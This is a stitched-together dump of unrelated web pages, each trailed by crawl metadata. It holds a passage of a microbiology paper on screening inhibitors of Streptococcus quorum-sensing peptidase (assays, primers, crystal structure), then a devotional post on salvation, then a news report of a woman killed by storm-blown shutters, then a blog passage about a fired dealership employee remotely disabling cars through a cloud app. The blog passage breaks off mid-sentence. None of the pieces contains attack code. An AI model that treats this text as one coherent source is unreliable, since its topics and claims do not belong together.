is, substrate-mimetic receptor inhibitors19, 20. One major drawback of this strategy is that amino acid sequences of autoinducer peptides are highly variable among bacterial species, or in some cases even among strains, and therefore, labor-intensive drug development would have to be done for each species. We believe that PEP of ComA is a more suitable target for inhibitor development for the following reasons: First, PEP catalyzes the initial step of the quorum-sensing system of Streptococcus. Second, among ubiquitous ABC transporters, ComA-like transporters equipped with the peptidase domains are found only in prokaryotes, thus minimizing the possibility of unpredictable adverse effects13. Third, because, as far as we have been able to determine, all streptococcal PEPs have a common substrate recognition mechanism17, it may be possible to develop a quorum-sensing inhibitor that is effective for a range of streptococcal species in which PEPs play an important role in the quorum-sensing system. In this study, we set out to screen a library of small compounds for the inhibitory activity against S. mutans PEP (MuPEP1) by high-throughput screening. Results and Discussion High-throughput Screening of PEP Inhibitors We established a high-throughput screening system using a fluorescence-labeled substrate (tCComC-AFC) (Fig. 1B and Supplementary Fig. S1). S. cristatus ComC (CComC) was used because S. mutans ComC could not be chemically synthesized and CComC was a good substrate of MuPEP117. The first screening of 164,514 compounds (Z′-factor value of 0.93, Supplementary Fig. S2) yielded 951 hits (0.58%) that inhibited MuPEP1 activity by >50% at a compound concentration of 20 μM. After the inhibitory activities of the selected compounds were re-evaluated by high-performance liquid chromatography assay, dose-dependent inhibition against MuPEP1 was examined in a second screening that yielded 110 compounds with IC50 values of <20 μM. To check both the cell permeability and in vivo activity, these compounds were further subjected to a third screening that examined inhibition against S. mutans biofilm formation. Some compounds inhibited biofilm formation but also showed antimicrobial toxicity to S. mutans, which indicated some non-specific in vivo activities. Finally, six compounds were found to inhibit biofilm formation without inhibiting cell growth. Two of the six compounds were quinuclidine derivatives, and the other four compounds had no primary chemical structure in common. Effects of Compound 1 on the Quorum-sensing Pathway To validate the outcome of the whole screening process, these compounds and some of their derivatives were (re-)synthesized or purchased, and their inhibitory activities against MuPEP1 were evaluated. We found one potent compound that showed an IC50 value of 38 μM (Supplementary Fig. S3), and this compound with a quinuclidine core was designated Compound 1 (see Supplementary Methods for detailed information about the compound). We first examined the S. mutans biofilm formation in the presence of various concentrations of Compound 1 by using the same method as used in the third screening. The biofilm formation was dose-dependently suppressed by Compound 1, with an EC50 value of 5 μM (Fig. 2A). A high background (value of approximately 0.5 for absorbance at 595 nm) of this method would be due to adherent bacteria on the flat bottom of the microtiter plate after overnight standing of the culture. The inhibitory effect was more clearly shown by the standing culture in tilted round-bottom culture tubes (Fig. 2B). Although the biofilm formed in the absence of Compound 1 remained tightly stuck to the wall of the tube after shaking, the biofilm formed in the presence of 25 μM Compound 1 was easily detached and dispersed after gentle swirling. It is noteworthy that Compound 1 did not show antimicrobial activity against S. mutans under this condition (Fig. 2B). The effect of Compound 1 on the competence development of S. mutans was also evaluated. The transformation efficiency of S. mutans decreased to 35% in the presence of 10 μM Compound 1 (Fig. 2C). To examine the effect of Compound 1 downstream of the quorum-sensing pathway, the expression levels of two bacteriocin genes, nlmA and nlmC, were estimated by quantitative RT-PCR. These genes are unrelated to biofilm formation or competence development but are well known to be directly regulated by the response regulator ComE21. As shown in Fig. 2D, the relative gene expression levels of nlmA and nlmC were suppressed to 18% and 23% by 25 μM Compound 1, respectively. These results showed that Compound 1 was efficiently taken up into the cell, inhibited PEP activity, and effectively perturbed quorum-sensing signaling, which eventually should lead to poor biofilm formation and low transformation efficiency of S. mutans. To assess the inhibition mechanism of Compound 1, kinetic analysis was performed at various concentrations of tCComC-AFC in the presence of 0, 50, and 100 μM of Compound 1 (Fig. 2E, the Lineweaver–Burk plot in Supplementary Fig. S4). The data (Vmax decreased, K m was unaffected) demonstrated that Compound 1 non-competitively inhibited MuPEP1, with a K i value of 38 μM. From these results, we assumed that Compound 1 is an allosteric inhibitor, which binds to a site apart from the catalytic center of MuPEP1. To address this idea, we tried to resolve the structure of MuPEP1 complexed with Compound 1 by soaking and co-crystallization methods under various conditions, but the diffraction data revealed no bound compound molecule. Identification and Characterization of the Allosteric Site Therefore, we prepared another form of MuPEP1 with the four N-terminal residues truncated (tMuPEP1), a form that was found to be crystallized in a different space group from that of MuPEP1. We also tested several synthetic analogs of Compound 1 and revealed the structure of tMuPEP1 in complex with Compound 2 (Fig. 3A) at a 3.1 Å resolution (Supplementary Table S1). The electron density of v-shaped Compound 2 was clearly observed in a pocket composed of β-strand (Phe63–Lys69), α-helix (Asp71–Tyr77), loop (Asn78–Pro83), Ala70, and the side chain of Phe137 (Fig. 3B). The binding is mainly mediated through hydrophobic and van der Waals interactions. A few hydrogen bonds might also contribute, but the interactions cannot be specified at this resolution. Although the physiological function of this relatively hydrophobic pocket (Fig. 3C) is unknown, the residues interacting with Compound 2 are conserved among Streptococcus PEPs (Fig. 3D, dots). In the crystal structure of the original MuPEP1, this pocket is occupied by residues from the adjacent protein molecule, which would explain why the complex structure could not be obtained. The side chain of Arg66 occupies the vacant space of this binding pocket in free tMuPEP1, whereas it is rotated away to avoid steric hindrance with Compound 2 in the tMuPEP1-Compound 2 complex (Fig. 3B). There are no other significant differences in either the overall structure or the catalytic triad residues between the free and complex structures of tMuPEP1. The question now arises how the inhibitor modulates the peptidase activity of PEP by binding to this remote site. We previously proposed the structure of the acyl-intermediate model obtained by molecular dynamics simulation based on the crystal structure of MuPEP118. Interestingly, when the structure of the acyl-intermediate was compared with that of the free MuPEP1, amino acid residues that were shifted most remarkably were those that comprised the binding pocket for Compound 2 (Fig. 4A). The positions of C α atoms of Asp76 and Tyr77 in the loop were shifted by 3.7 Å and 4.4 Å, respectively, and those of Ala139, Pro140, and Gln141 in the C-terminal β-strand were shifted by 2.0 Å, 2.7 Å, and 2.7 Å, respectively. Consequently, the space of this pocket was significantly constricted in the acyl-intermediate model. Superimposition of the acyl-intermediate model and the tMuPEP1-Compound 2 complex structure showed direct collision between the bound inhibitor and some residues lining the pocket (Fig. 4B). Taken together, the following inhibition mechanism is proposed: After substrate binding, PEP catalysis proceeds via an acyl-intermediate-like transition state in which a pocket on the protein surface is compressed. When an inhibitor binds to this pocket, the inhibitor prevents the structural changes and non-competitively inhibits the PEP activity (Fig. 4C). To support this hypothesis, the bulky side chain of an arginine was introduced into this pocket at the position of Ala70 (Fig. 3B), which resulted in the catalytic efficiency decreasing to approximately 1% (the k cat/K m of the wild-PEP was 69 M−1s−1 and that of the Ala70Arg mutant was 0.73 M−1s−1). The significant effect of the mutation at this remote site implies the importance of the pocket during the catalysis. Recently, such “secondary” binding sites have been explored as druggable sites in many proteins by fragment-based drug screening22. Effects of MuPEP1 Inhibitors on S. pneumoniae PEP, S. oralis PEP, and the Peptidase Domain of S. pneumoniae BlpA To examine whether Compound 1 inhibits PEPs from other streptococcal species, S. pneumoniae PEP15 and S. oralis PEP17 were chosen, both of which showed moderate homology with MuPEP1 (57% and 59%, respectively, identity in the amino acid sequence). Compound 1 inhibited S. pneumoniae PEP and S. oralis PEP, with IC50 values of 29 μM and 25 μM, respectively (Supplementary Fig. S3). Additionally, 80% of 85 compounds selected after the second screening were found to efficiently inhibit PEP from S. pneumoniae (Supplementary Fig. S5). These results support the idea that all PEPs catalyze the reaction through the same catalytic process described above and that development of an inhibitor that is effective in various species of Streptococcus might indeed be possible. BlpA is a ComA-like ABC-transporter that is responsible for the processing and secretion of a bacteriocin, BlpC23. BlpC has the Gly–Gly motif at the cleavage site and the four conserved hydrophobic residues in the N-terminal leader region17 (Supplementary Fig. S6). The amino acid residues composing the inhibitor-binding pocket of PEPs were also conserved in the peptidase domain of BlpA (Fig. 3D). Indeed, the peptidase domain of BlpA (67% amino acid identity with MuPEP1) efficiently cleaved the fluorescent-labeled substrate tCComC-AFC (Supplementary Fig. S1), and Compound 1 inhibited the peptidase domain of BlpA, with an IC50 value of 16 μM. These results indicate the possibility that Compound 1 inhibits a wide variety of the peptidase domains of bacterial ComA-like ABC transporters, including those of Streptococcus commensal species, some of which may function in the maintenance of the commensal flora. Thus, it should be noted that this inhibitor might disturb the beneficial effect of the nasopharyngeal commensals when used as a drug. In this study, we focused on PEP as the target of potential inhibitors of the Streptococcus quorum-sensing pathway, established a reliable high-throughput screening system using a synthetic substrate for PEP, and successfully obtained a compound that was found to allosterically inhibit PEP and suppress the quorum-sensing pathway, which eventually led to attenuated biofilm formation. Compound 1, albeit with a modest EC50 of 5 μM, could be a candidate molecule for further drug development, and the present results could serve as proof-of-principle for the attempt to develop small-molecule inhibitors of the quorum-sensing system, which can affect multiple clinical conditions but have negligible antimicrobial activity. The fluorogenic peptide tCComC-AFC, Ala-Gln-Phe-Pro-Val-Leu-Asn-Glu-Lys-Glu-Leu-Lys-Glu-Val-Leu-Gly-Gly-AFC, was purchased from Scrum (Tokyo, Japan). The chemical compound library consisting of 164,514 compounds was supplied from Drug Discovery Initiative, University of Tokyo (Tokyo, Japan). The chemically defined medium (CDM) contains 58 mM K2HPO4, 15 mM KH2PO4, 10 mM (NH4)2SO4, 35 mM NaCl, 2 mM MgSO4, 4 mM L-glutamate, 1 mM L-arginine monohydrochloride, 1.3 mM L-cysteine, 0.1 mM L-tryptophan, 0.2% casamino acids (Nippon Pharmaceutical, Tokyo, Japan), 44 mM glucose, and 1 × Kao and Michayluk vitamin solution (Sigma-Aldrich, St. Louis, MO). The Streptococcus–E. coli shuttle vector pSET224 and its host strain, E. coli MC1061, were obtained from National Agriculture and Food Research Organization and National BioResource Project (NIG, Japan), respectively. Plasmid Constructions for Expression of the Peptidase Domains The expression plasmids for tMuPEP1 were constructed by using the PrimeSTAR mutagenesis method (Takara, Otsu, Japan) using the MuPEP1 expression plasmid, pSMuP1, as the template17. The primers used were 5′-ACATATGTATAAGCTAGTACCTCAGATTGATAC-3′ (forward) and 5′-AGCTTATACATATGTATATCTCCTTCTTAAAGT-3′ (reverse), respectively. For the Ala70Arg tMuPEP1, the single mutation was introduced into the expression plasmid of tMuPEP1 by using primers 5′-ATCAAGCGTGATATGACGCTTTTTGATTATAAT-3′ (forward) and 5′-CATATCACGCTTGATAGAGCGTGTTTCAAAGCC-3′ (reverse). The nucleotide sequences of the entire coding regions were verified. For the peptidase domain of S. pneumoniae G54 BlpA, the dsDNA corresponding to the coding region (GenBank CP001015, bases 475628–476077) with NdeI and SalI sites on the 5′ and 3′ terminal ends, respectively, was chemically synthesized and cloned into pEX-A2J1 (Eurofins Genomics K. K. (Tokyo, Japan)). A His6-tag sequence was attached to the C-terminal end for the convenience of the purification. The coding DNA was digested with NdeI and SalI and ligated into pET21-b to generate the pSPB1. Protein Expression and Purification For the high-throughput screening and enzyme assay, MuPEP1, S. pneumoniae PEP, and S. oralis PEP were heterologously expressed in E. coli BL21 (DE3) pLysS and purified as previously described14, 16. Briefly, E. coli cells, carrying each expression plasmid, were grown and induced by 0.2 mM isopropyl-β-D-thiogalactopyranoside for 2 h at 37 °C for MuPEP1 or for 5 h at 30 °C for S. pneumoniae PEP. The PEPs were purified with His·Bind resin (Novagen, Madison, WI) and dialyzed at 4 °C against a buffer containing 20 mM Tris–HCl, 200 mM ammonium sulfate, and 0.1 mM DTT, pH 7.0. For crystallization, tMuPEP1 was heterologously expressed in E. coli Rosetta™ 2 (DE3) pLysS. E. coli cells carrying the expression plasmid were grown and induced by 0.2 mM isopropyl-β-D-thiogalactopyranoside for 3 h at 37 °C. The tMutPEP1 was purified by using the same procedure as that for MuPEP1. The purified protein was dialyzed at 4 °C against a buffer containing 70 mM sodium phosphate and 0.1 mM DTT, pH 7.0. The catalytic activity of tMuPEP1 was identical to that of MuPEP1. The Ala70Arg tMuPEP1 and the peptidase domain of S. pneumoniae BlpA were expressed and purified by using the same method. To establish a rapid and robust enzyme assay, we prepared the fluorogenic peptide tCComC-AFC, which corresponds to the N-terminal leader region (−17 to −1) of ComC from S. cristatus derivatized with 7-amino-4-(trifluoromethyl) coumarin (AFC) at the C-terminal end. This region of ComC is necessary and sufficient for the interaction with PEP17. The [S]−v/[E] plots of the PEP assay for tCComC-AFC fit well to the typical Michaelis–Menten curve like those for natural substrates15, 17. Thus, this synthetic peptide was used as a functionally relevant substrate. Assays were performed in black flat-bottom 384-well plates (Greinar, 784900) under ambient conditions. All compounds dissolved in DMSO were predispensed on the plate (100 nL/well) with the final concentration of 20 μM, and then aliquots of 5 μL of 0.5 μM MuPEP1 (final concentration) in 50 mM Tris-HCl, 150 mM ammonium sulfate, and 0.02% Triton X-100 were dispensed to each well by using a Multidrop Combi dispenser (Thermo Fisher Scientific, Vantaa, Finland). Reactions were initiated by adding aliquots of 5 μL/well of 10 μM tCComC-AFC (final concentration) in 50 mM Tris-HCl, 150 mM ammonium sulfate, 4% DMSO, and 0.02% Triton X-100 by using the dispenser. These reaction mixtures contained DMSO at a 3% final concentration. Each 384-well plate contained 16 negative control wells (lacking MuPEP1) and 16 positive control wells (100 nL of DMSO replacing 100 nL of compound in DMSO). After 3-h incubation, the fluorescence intensity of the released AFC was measured by using a microplate reader, PHERAstar (BMG Labtech, Offenburg, Germany), with excitation at 380 nm and emission at 490 nm. An inhibition rate for each compound was calculated as follows: where FLc is the fluorescence intensity of the well containing the tested compound, FLp is the fluorescence intensity of the well containing the positive control, and FLn is the fluorescence intensity of the well containing the negative control. High-performance Liquid Chromatography Assay Fifteen microliters of 3.3 mM of phosphoric acid was added to 8 μL of the reaction mixtures from the screening. Then, 7.5 μL of those mixtures were loaded onto a YMC Triart C18 reversed-phase column (3.0 × 50 mm, 3-μm particle diameter) (YMC, Kyoto, Japan) connected to a LC2000 high-performance liquid chromatography system equipped with an autosampler (Jasco, Tokyo, Japan), and AFC was separated from the unreacted tCComC-AFC by using a mobile phase consisting of 55% of acetonitrile in water with 0.45% formic acid over 2.5 min at a flow rate of 0.5 mL/min under ambient temperature. The fluorescence was detected by using excitation at 360 nm and emission at 470 nm. An inhibition rate for each compound was calculated as follows: where FLc is the fluorescence intensity of the well containing the tested compound, and FLp is the fluorescence intensity of the well containing the positive control. Determination of IC50 Value in the Second Screening Dose-dependent inhibitory activities of compounds against MuPEP1 were examined in quadruplicate. Assays were performed under the same conditions used in the first screening except with various concentrations of compound (0.2, 0.6, 2, 6, and 20 μM). An IC50 value for each compound was calculated as follows: where Lowinh(%) is the inhibition (%) directly below 50% inhibition, Highinh(%) is the inhibition (%) directly above 50% inhibition, Lowconc is the corresponding concentration of tested compound directly below 50% inhibition, and Highconc is the corresponding concentration of tested compound directly above 50% inhibition. Biofilm Formation and Bacterial Growth Assay Overnight culture of S. mutans strain UA159 (ATCC 700610) in BHI medium was inoculated into 200 μL of CDM per well (3.0 × 106 CFU) of the flat-bottomed 96-well microtiter plate (Corning, 3595). After 18 h of standing incubation at 37 °C in 5% CO2 under anaerobic condition in an AnaeroPack system (Mitsubishi Gas Chemical, Tokyo, Japan), the cultured medium was removed, and adherent bacteria were stained with 200 μL of 0.005% crystal violet for 30 min. The wells were washed twice with 300 μL of distilled water and then air dried. The dye was extracted into 200 μL of 60% ethanol, and the biofilm mass was estimated by using a microplate reader (Bio-Rad, Model 680XR) (Bio-Rad, Hercules, CA) to measure the absorbance at 595 nm. The bacterial growth was determined by measuring the turbidity (absorbance at 595 nm) of parallel wells. For the count of viable cells shown in Fig. 2B, part of the culture was serially diluted and spread onto the BHI plate, and the plates were incubated overnight at 37 °C in 5% CO2 under anaerobic condition. Four microliters of the overnight culture of S. mutans in BHI medium was inoculated to 0.4 mL of CDM in the absence or presence of 10 µM Compound 1. After 7.5 h incubation at 37 °C in 5% CO2 under anaerobic condition in the AnaeroPack system, 1 μg of plasmid pSET2 was added to the culture. After additional 3-h growth, the cultures were chilled on ice, and serial dilutions of the cultures were plated onto BHI agar plates (for enumeration of total CFU) and onto BHI agar plates containing 1 mg/mL spectinomycin (for enumeration of transformants). Transformation efficiency was determined after 24–48 h incubation at 37 °C in 5% CO2 under anaerobic condition. Real-time Quantitative RT-PCR Six microliters of the overnight culture of S. mutans in BHI medium was inoculated into 0.4 mL of CDM. After 17 h of incubation at 37 °C in 5% CO2 under anaerobic condition in an AnaeroPack system, cells were collected by centrifugation and treated with labiase (Cosmo Bio, Tokyo, Japan), and total RNA was extracted and purified by using a PureLink™ RNA Mini kit (Ambion, Austin, TX). Purified RNA was reverse transcribed to cDNA by using SuperScript® VILO™ cDNA Synthesis kit. Quantitative real-time PCR was performed by using a Power SYBR® Green PCR Master Mix (Applied Biosystems, Foster City, CA) on a StepOnePlus Real–Time PCR system (Applied Biosystems). The gene expression levels were calculated by using the ΔΔ threshold cycle (ΔΔC T) method25. The 16S rRNA gene of S. mutans was used as the housekeeping reference. The oligonucleotides to amplify each gene were as follows: 5′-GCTTACCAAGGCGACGATACA-3′ and 5′-GCGTTGCTCGGTCAGACTTTC-3′ for 16S rRNA, 5′-GGACAGCCAAACACTTTCAACTG-3′ and 5′-TTGCCGCGACTGCTTCTC-3′ for nlmA (SMU. 150), and 5′-ATGGAATTGTGCAGCAGGTATTG-3′ and 5′-CGCCTGCAGTAGCCATATAAC-3′ for nlmC (SMU. 1914C). All experiments using commercially available kits were performed according to the manufacturer’s instructions. The PEP activity was assayed in a 110-μL reaction mixture containing 50 mM Tris-HCl, 150 mM ammonium sulfate, 0.02% Triton X-100, and various concentrations of the substrate. The reaction was started by adding the PEP solution to a final concentration of 0.25–2.0 μM. The reaction was performed at 25 °C, 50 μL of the reaction mixture was transferred to a white 96-well microtiter plate (Thermo Scientific 236105), and the fluorescence intensity was immediately measured by using a Promega GloMax®-Multi plus Detection System (Promega, Madison, WI) with excitation at 405 nm and emission at 495–505 nm. Structure Determination and Analysis tMuPEP1 was crystallized by using the sitting drop vapor diffusion method. The 16.4-mg/mL protein solution was mixed with an equal volume of 100 mM Bis-Tris (pH 5.5) containing 200 mM ammonium sulfate and 25% (w/v) polyethylene glycol 3,350. The drop was equilibrated against 800 μL of the reservoir solution at 20 °C. The obtained crystal was soaked in a 2-μL drop of the buffer containing 1 mM Compound 2, 50 mM Bis-Tris (pH 5.5), 100 mM ammonium sulfate, 12.5% (w/v) polyethylene glycol 3,350, and 1% DMSO. After incubation for 1 h at room temperature, the crystal was cryo-cooled without an additive cryoprotectant at −173 °C. The diffraction data at 1.0000 Å wavelength were collected by using a MX225HE detector (Rayonix, Evanston, IL) at SPring-8 BL38B1 (Hyogo, Japan). The diffraction data were processed and scaled by using the HKL2000 program package26. The structure was solved by molecular replacement using the structure of MuPEP1 (3K8U) as the search model. The program MOLREP27 in CCP4 suite was used for the rotation and translation searches. The model was refined by using the REFMAC528 in CCP4 suite, COOT29, and PHENIX30 programs. The stereochemistry of the structure was checked by using the program PROCHECK31 in CCP4 suite. Although two PEP molecules were found to form a dimer in the crystal, this dimer was estimated to be unstable and non-physiological according to the Protein Interfaces, Surface and Assemblies (PISA) service32. No electron density was visible for the N-terminal methionine residues of both subunits and a large part of the C-terminal residues (142–150 of the molecule A and 141–150 of the molecule B), including the His-tag. In molecule B, 13 residues (26–38) were also invisible. In the structure of the tMuPEP1-Compound 2 complex, Compound 2 was bound only in the molecule B. Further details of the crystallographic data and statistics are described in Supplementary Table S1. Meyer, D. H. & Fives-Taylor, P. M. Oral pathogens: from dental plaque to cardiac disease. Curr. Opin. Microbiol. 1, 88–95 (1998). Vogkou, C. T., Vlachogiannis, N. I., Palaiodimos, L. & Kousoulis, A. A. The causetive agents in infective endocarditis: a systematic review comprising 33,214 cases. Eur. J. Clin. Microbiol. Infect. Dis. 35, 1227–1245 (2016). Costerton, J. W., Stewart, P. S. & Greenberg, E. P. Bacterial biofilms: a common cause of persistent infections. Science 284, 1318–1322 (1999). Brackman, G. & Coenye, T. Quorum sensing inhibitors as anti-biofilm agents. Curr. Pharm. Des. 21, 5–11 (2015). Fuqua, W. C., Winans, S. C. & Greenberg, E. P. Quorum sensing in bacteria: the LuxR-LuxI family of cell density-responsive transcriptional regulators. J. Bacteriol. 176, 269–275 (1994). Hossain, M. S. & Biswas, I. An Extracellular protease, SepM, generates functional competence-stimulating peptide in Streptococcus mutans UA159. J. Bacteriol. 194, 5886–5896 (2012). Cvitkovitch, D. G., Li, Y. H. & Ellen, R. P. Quorum sensing and biofilm formation in streptococcal infections. J. Clin. Invest. 112, 1626–1632 (2003). Prudhomme, M., Attaiech, L., Sanchez, G., Martin, B. & Claverys, J. P. Antibiotic stress induces genetic transformability in the human pathogen Streptococcus pneumoniae. Science 313, 89–92 (2006). Heng, N. C. K., Tagg, J. R. & Tompkins, G. R. Competence-dependent bacteriocin production by Streptococcus gordonii DL1 (Challis). J. Bacteriol. 189, 1468–1472 (2007). Yoshida, A. & Kuramitsu, H. K. Multiple Streptococcus mutans genes are involved in biofilm formation. Appl. Environ. Microbiol. 68, 6283–6291 (2002). Vidal, J. E., Howery, K. E., Ludewick, H. P., Nava, P. & Klugman, K. P. Quorum-sensing systems LusxS/autoinducer 2 and Com regulate Streptococcus pneumoniae biofilms in bioreactor with living cultures of human respiratory cells. Infect. Immn 81, 1341–1353 (2013). Garcia-Contreras, R., Maeda, T. & Wood, T. K. Can resistance against quorum-sensing interference be selected? ISME J. 10, 4–10 (2016). Håvarstein, L. S., Diep, D. B. & Nes, I. F. A family of bacteriocin ABC transporters carry out proteolytic processing of their substrates concomitant with export. Mol. Microbiol. 16, 229–240 (1995). Lin, D. Y., Huang, S. & Chen, J. Crystal structures of a polypeptide processing and secretion transporter. Nature 523, 425–430 (2015). Ishii, S., Yano, T. & Hayashi, H. Expression and characterization of the peptidase domain of Streptococcus pneumoniae ComA, a bifunctional ATP-binding cassette transporter involved in quorum sensing pathway. J. Biol. Chem. 281, 4726–4731 (2006). Ishii, S., Yano, T., Okamoto, A., Murakawa, T. & Hayashi, H. Boundary of the nucleotide-binding domain of Streptococcus ComA based on functional and structural analysis. Biochemistry 52, 2545–2555 (2013). Kotake, Y., Ishii, S., Yano, T., Katsuoka, Y. & Hayashi, H. Substrate recognition mechanism of the peptidase domain of the quorum-sensing-signal-producing ABC transporter ComA from Streptococcus. Biochemistry 47, 2531–2538 (2008). Ishii, S. et al. Crystal structure of the peptidase domain of Streptococcus ComA, a bifunctional ATP-binding cassette transporter involved in the quorum-sensing pathway. J. Biol. Chem. 285, 10777–10785 (2010). Zhu, L. & Lau, G. W. Inhibition of competence development, horizontal gene transfer and virulence in Streptococcus pneumoniae by a modified competence stimulating peptide. PLoS Pathog. 7, e1002241 (2011). Wang, B. & Muir, T. W. Regulation of Virulence in Staphylococcus aureus: Molecular Mechanisms and Remaining Puzzles. Cell Chem. Biol. 23, 214–224 (2016). Hung, D. C. et al. Characterization of DNA binding sites of the ComE response regulator from Streptococcus mutans. J. Bacteriol. 193, 3642–3652 (2011). Ludlow, R. F., Verdonk, M. L., Saini, H. K., Tickle, I. J. & Johti, H. Detection of secondary binding sites in proteins using fragment screening. Proc. Natl. Acad. Sci. U. S. A 112, 15910–15915 (2015). Wholey, W. Y., Kochan, T. J., Stock, D. N. & Dawld, S. Coordinated bacteriocin expression and competence in Streptococcus pneumoniae contributes to genetic adaptation through neighbor predation. PLoS Pathog. 12, e1005413 (2016). Takamatsu, D., Osaki, M. & Sekizaki, T. Construction and characterization of Streptococcus suis–Escherichia coli shuttle cloning vectors. Plasmid 45, 101–113 (2001). Livak, K. I. & Schmittgen, T. D. Analysis of relative gene expression data using real-time quantitative PCR and the 2(-Delta Delta C(T)). Method. Methods 25, 402–408 (2001). Otwinowski, Z. & Minor, W. Processing of X-ray diffraction data collected in oscillation mode. Methods Enzymol. 276, 307–326 (1997). Vagin, A. & Teplyakov, A. Molecular replacement with MOLREP. Acta Crystallogr. D. Biol. Crystallogr. 66, 22–25 (2010). Murshudov, G. N. et al. REFMAC5 for the refinement of macromolecular crystal structures. Acta Crystallogr. D. Biol. Crystallogr. 67, 355–367 (2011). Emsley, P., Lohkamp, B., Scott, W. G. & Cowtan, K. Features and development of Coot. Acta Crystallogr. D. Biol. Crystallogr 66, 486–501 (2010). Adams, P. D. et al. PHENIX: a comprehensive Python-based system for macromolecular structure solution. Acta Crystallogr. D. Biol. Crystallogr. 66, (213–221 (2010). Laskowski, R. A., MacArthur, M. W., Moss, D. S. & Thornton, J. M. PROCHECK: a program to check the stereochemical quality of protein structures. J. Appl. Crystallogr. 26, 283–291 (1993). Krissinel, E. & Henrick, K. Detection of protein assemblies in crystals. In Computational Life Sciences pp. 163–174 (Springer, 2005). Pettit, F. K., Bare, E., Tsai, A. & Bowie, J. U. HotPatch: a statistical approach to finding biologically relevant features on protein surfaces. J. Mol. Biol. 369, 863–879 (2007). The crystallographic experiments were performed at BL38B1 in SPring-8 (Proposals 2015A1065 and 2015B2065). We thank T. Murakawa and the BL38B1 beamline staff at SPring-8 for help with structural analysis, H. Nakano and I. Minegishi for help with high-throughput screening analysis, C. Koda for help with compound management, and R. Nagae and H. Hori for help with technical assistance. This research is (partially) supported by the Platform Project for Supporting in Drug Discovery and Life Science Research (Platform for Drug Discovery, Informatics, and Structural Life Science) from the Ministry of Education, Culture, Sports, Science, and Technology (MEXT) and Japan Agency for Medical Research and Development (AMED). The authors would like to thank Enago (www.enago.jp) for the English language review. The authors declare that they have no competing interests. Accession codes: The crystal structures of the tMuPEP1-Compound 2 complex and free tMuPEP1 have been deposited in the Protein Data Bank under accession codes 5XE9 and 5XE8, respectively. Publisher's note: Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. Electronic supplementary material About this article Cite this article Ishii, S., Fukui, K., Yokoshima, S. et al. High-throughput Screening of Small Molecule Inhibitors of the Streptococcus Quorum-sensing Signal Pathway. Sci Rep 7, 4029 (2017). https://doi.org/10.1038/s41598-017-03567-2 Identification of a juvenile-hormone signaling inhibitor via high-throughput screening of a chemical library Scientific Reports (2020) Archives of Microbiology (2018) Impact of phenolic compounds in the acyl homoserine lactone-mediated quorum sensing regulatory pathways Scientific Reports (2017)
<urn:uuid:bef2f335-8735-49bc-b50a-490afd27517e>
CC-MAIN-2022-33
https://www.nature.com/articles/s41598-017-03567-2?error=cookies_not_supported&code=c0807a7a-9ec7-42e4-a1a5-97b2874c3126
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571150.88/warc/CC-MAIN-20220810070501-20220810100501-00676.warc.gz
en
0.905484
9,441
2.359375
2
Romans 1:16, “I am not ashamed of the gospel, because it is the power of God for the salvation of everyone who believes: first for the Jew, then for the Gentile.” Paul in the above verse gives the promise that everyone who believes in the Gospel receives salvation. You are apart of “everyone,” therefore if you believe in the Gospel you are saved. Thus, you have a great promise for salvation today no matter what you are facing in life. The Gospel is the “good news” about Jesus’ death, burial, and resurrection from the dead to be the “once and for all” sacrifice for all of mankind’s sins. Salvation simply means, “to be saved from Satan’s power, your sin, and physical death.” First, because of Jesus you are saved from the power of the devil. You are no longer forced to be his slave and to live in fear his lies because Jesus defeated the Devil for you, 1 John 3:8! Second, you are saved from your own sin. Sin no longer has a presence, power, or penalty in your life. You have been washed clean and made new, thus you are saved from sin to be righteous and holy, 1 John 3:9. Lastly, Jesus saved you from physical death. Though your body may die, Jesus promises to raise it up in the last days to be an immortal indestructible body, 1 Corinthians 15:53. As a result, death no longer has a sting to you because you are going to live forever in bliss with Jesus upon the new earth. Therefore, put your full trust in Jesus as your “Savior” and don’t be ashamed of the Gospel, because it is God’s promise of salvation for you and all who believe it! - Examine your heart to see if you have “assurance” of being saved. - If you lack assurance, search your heart to see if you are in sin and repent. If you have assurance, praise God for His wonderful saving work in your life. - Share the Gospel, God’s promise of salvation, with someone today!
<urn:uuid:683382c1-e5ab-4a17-b8a7-f1082e691f46>
CC-MAIN-2022-33
https://mpichurch.org/2013/02/28/feb-1-the-promise-of-salvation/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571190.0/warc/CC-MAIN-20220810131127-20220810161127-00069.warc.gz
en
0.944363
466
1.71875
2
File photo: Julie Kertesz/Flickr The 68-year-old woman died on Sunday afternoon at her home in Sorgues, not far from Avignon in southeastern France. She was reportedly closing her window shutters at the time, when a 110 km/hr gust of wind slammed the shutters into her head. One of the shutters, known as volets in French “smashed the woman's skull”, the local prosecutor said according to the Dauphiné Libéré newspaper. Emergency crews were unable to revive the woman, who died at the scene. The strong winds over the weekend saw around 30 calls to emergency services in the area, mostly for structural damages and fallen trees. Photo: Google Maps
<urn:uuid:883a9f19-766e-4749-8128-8600a8812486>
CC-MAIN-2022-33
https://www.thelocal.fr/20160502/storm-sees-frenchwoman-killed-by-window-shutters/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570767.11/warc/CC-MAIN-20220808061828-20220808091828-00465.warc.gz
en
0.966836
159
1.523438
2
Earlier this year, an employee who had been terminated from his job at a car dealership disabled more than 100 cars using a cloud-based application. The app evidently worked in conjunction with a device that dealers attached to the car to disable it or make it start honking as an incentive to get dead-beat car loan holders to pay up. The people who bought cars from that dealership felt violated, humiliated, and angry. Allegedly, the horns were only supposed to honk between 9:00 AM and 5:00 PM, instead of the middle of the night as some owners claimed. Other owners said that they had to have their "disabled" cars towed in the morning, which also made them late for work. Sure, these folks accepted a device like this on a car purchase because financial difficulties would have prevented them from securing a loan otherwise. But we can expect to see more cases where the most vulnerable members of society find themselves exploited the worst by emerging cloud technologies. This particular case is a little unusual, because the person who exploited the system was an employee of the car dealership, not the cloud provider who offered the service. However, I still think this is a liability that is – at the very least – made worse by cloud-based apps. An internally-hosted application could be designed to be unavailable over the public network. As a matter of fact, the challenge with internally-based apps that makes the cloud so attractive is making those internal apps available to remote employees who have a legitimate need to access them. If the only way to get into the aforementioned system was to be at the dealership on a trusted machine, authenticated on the dealership's LAN, this story would not have made national news, because the former, disgruntled employee wouldn't have been able to carry out his plans. It also means that this application is accessible through the public network to any hacker who might want to try his or her hand at some mischief. I've already expressed my concern about cloud start-ups with great ideas and horrible execution (ma.gnolia's data loss of user online bookmarks, which led them to close their operations last year). I predicted that this kind of failure was not necessarily limited to small start-ups with good 